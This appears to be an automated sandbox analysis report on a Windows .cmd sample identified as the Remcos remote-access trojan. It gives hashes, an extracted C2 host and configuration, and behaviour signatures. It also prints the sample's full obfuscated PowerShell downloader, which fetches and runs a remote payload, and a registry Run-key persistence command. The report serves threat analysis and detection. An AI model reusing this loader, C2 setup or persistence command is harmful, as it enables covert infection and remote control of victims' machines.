Overview

overview

10

Static

static

1

rIMG465244...ng.cmd

windows7-x64

10

rIMG465244...ng.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    96s
  • max time network
    101s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    21/10/2024, 06:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rIMG465244247443GULFORDEROpmagasinering.cmd

  • Size

    5KB

  • MD5

    d4a5745ec008932bec834b981d31bd8f

  • SHA1

    c57e44498a52b6aa60e55c19a16cb026104fa19c

  • SHA256

    40b46bae5cca53c55f7b7f941b0a02aeb5ef5150d9eff7258c48f92de5435216

  • SHA512

    7de89b88dbba6d2310ef79bad8bc6c82ec12b0e8c0abfc0229f3ca4765606c1c2f342cd996d63882e7e0aab4fd1f3d15d016108831e286d7e3aa26e09aef454f

  • SSDEEP

    96:zX+gBYcM44kNPsQa/+2bBRpgccIgEyHa9a6ONt/3nU56D+9EFA/W8v8OS7x+LSKv:T+gKc2k6Qa/cJJNd3n3wR+B1Kv

Score
10/10
remcosmiss chydiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

MISS Chy

C2

pelele.duckdns.org:51525

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-TXCR8B

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\rIMG465244247443GULFORDEROpmagasinering.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:840
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner ($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. S rHUpbre araOmkrdUdfoeInter eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner (Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139) {Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi ') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an ');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian 'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso .chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner (Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner (Abkhasian ' Kur$flyvg AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla ');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1516
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner ($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. S rHUpbre araOmkrdUdfoeInter eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner (Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139) {Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi ') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an ');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian 'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso .chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner (Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner (Abkhasian ' Kur$flyvg AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla ');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2352
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2800
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3036

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H2HK87YS0G87P0OUKRML.temp
    Filesize

    7KB

    MD5

    e08ea1e9c474c459c71db849e2ea7d75

    SHA1

    2c260dd435d798d349853d923a0583628ef996af

    SHA256

    96c26ca916f34d428d32f652da1e4ef201117be67de1c6bbe626aa3c02894514

    SHA512

    77efd31d269c84ef75f59218c09b8c69ea64e793c1d700a771368f6b74d60f573cce383313e359af23233a9a0b97ebc8d2802ceb578357371fb86b18c07781a8

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Rafting.Ans
    Filesize

    426KB

    MD5

    ce429a8bb4d6fe008bb30e20337dab1a

    SHA1

    aab03694aa2d8a456dd3fc03d7b1b76e6bcfbad4

    SHA256

    2757cc9a4254063d89899ea0013b5d7f12c76f8c68c776ac6b00b8c135e53746

    SHA512

    fbb466962fcbceff06daa0266c37c43d1a124ac991aea0b7dd5fe6fb0f0d93bf2dfbff48005e5f622f8a54f08e3f07b4000e898683ffcf1bc0249ec846ebb72d

    Download Submit

  • memory/1516-7-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1516-4-0x000007FEF610E000-0x000007FEF610F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1516-8-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1516-9-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1516-10-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1516-11-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1516-14-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1516-6-0x0000000002490000-0x0000000002498000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1516-5-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2352-20-0x0000000000730000-0x0000000001792000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2352-36-0x0000000000730000-0x0000000001792000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2736-18-0x00000000062F0000-0x000000000BBF0000-memory.dmp

    Filesize

    89.0MB

    Download